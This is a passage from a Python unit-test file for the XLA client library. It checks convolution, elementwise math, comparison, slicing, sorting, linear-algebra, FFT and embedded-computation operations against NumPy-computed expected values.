[1120., 1180., 1240., 460.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(
c.Constant(lhs), c.Constant(rhs), [2, 1], xla_client.PaddingType.VALID)
result = np.array([[[
[640., 700., 760.],
[1120., 1180., 1240.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
c.ConvGeneralDilated(
c.Constant(lhs),
c.Constant(rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(
c.Constant(np.transpose(lhs, (0, 2, 3, 1))), c.Constant(rhs), strides,
pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
c.Clz(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=[17, 3])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), [(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testReducePrecision(self):
c = self._NewComputation()
c.ReducePrecision(
c.Constant(NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[float.fromhex("0x1.32p-3")])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(
c.Constant(NumpyArrayF32(0.)),
c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayF32(lo)),
c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayS32(lo)),
c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
c.Sort(c.Constant(keys))
self._ExecuteAndCompareClose(
c, expected=np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32))
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)), dimension=0)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = b.ParameterFromNumpy(NumpyArrayF32(0))
q0 = b.ParameterFromNumpy(NumpyArrayF32(0))
p1 = b.ParameterFromNumpy(NumpyArrayS32(0))
q1 = b.ParameterFromNumpy(NumpyArrayS32(0))
b.Or(b.Lt(p0, q0), b.And(b.Eq(p0, q0), b.Gt(p1, q1)))
comparator = b.Build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
c.Eigh(c.Constant(a), full_matrices=True)
# TODO(b/129396575): Turn this test back on when it passes without fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.SVD(c.Constant(a))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(
c.Constant(a_vals),
c.Constant(b_vals),
left_side=False,
lower=True,
transpose_a=True)
self._ExecuteAndCompareClose(
c,
expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32),
rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
c.Gather(c.Constant(a), c.Constant(indices), dnums, slice_sizes=[1, 1])
g = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=np.fft.fftn(a, axes=(1, 2, 3)), rtol=1e-4)
# IFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=np.fft.ifftn(a, axes=(1, 2, 3)), rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
c.Fft(c.Constant(b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=np.fft.rfftn(b, axes=(1, 2, 3)), rtol=1e-4)
# IRFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(
c, expected=np.fft.irfftn(a, axes=(1, 2, 3)), rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
c.NextAfter(
c.Constant(np.array([1, 2], dtype=np.float32)),
c.Constant(np.array([2, 1], dtype=np.float32)))
out = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(np.array([eps + 1, 2 - eps], dtype=np.float32), out)
def testRegularizedIncompleteBeta(self):
x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538])
a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606])
b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677])
c = self._NewComputation()
c.RegularizedIncompleteBeta(c.Constant(a), c.Constant(b), c.Constant(x))
expected = np.array(
[0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
self._ExecuteAndCompareClose(c, expected=expected, rtol=1e-4)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddS32Computation(self):
"""Computation (s32, s32) -> s32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayS32(0)),
c.ParameterFromNumpy(NumpyArrayS32(0)))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
